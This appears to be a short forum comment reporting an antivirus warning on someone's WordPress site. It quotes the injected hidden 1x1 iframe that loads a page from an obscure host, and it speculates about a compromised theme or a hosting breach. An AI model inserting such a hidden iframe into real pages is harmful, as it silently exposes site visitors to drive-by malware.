I got a virus warning from eset when I opened up his site.
<iframe src="http://d22cjhny6e.co.TLD/?go=1 width="1" height="1"></iframe>
(with the TLD being the country code for Tuvalu)Potentially the theme he downloaded always had that iframe or alternatively an attacker has gained access to his WordPress theme directory (or otherwise found a way to inject it). Luckily maintaining the security of a DreamHost shared Apache server (apache2-ogle.baghdad.dreamhost.com) is probably not necessary for an IT position. Additionally, it is possibly DreamHost's fault, as it has been in the past [1, 2].
[1] http://www.dreamhoststatus.com/2007/06/06/security-breach/
[2] http://www.dreamhoststatus.com/2007/06/11/web-hosting-break-...